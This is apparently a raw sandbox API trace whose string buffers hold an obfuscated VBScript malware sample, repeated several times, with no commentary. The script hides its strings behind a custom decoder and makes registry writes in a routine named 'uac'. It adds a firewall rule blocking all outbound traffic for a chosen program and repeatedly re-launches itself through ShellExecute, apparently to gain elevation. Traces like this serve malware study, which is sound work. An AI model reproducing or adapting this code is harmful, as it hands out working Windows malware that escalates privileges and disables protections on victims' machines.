bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.353] wcsncmp (_String1="nd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.353] wcsncmp (_String1="d If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.353] wcsncmp (_String1=" If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.353] wcsncmp (_String1="If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.353] wcsncmp (_String1="f\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 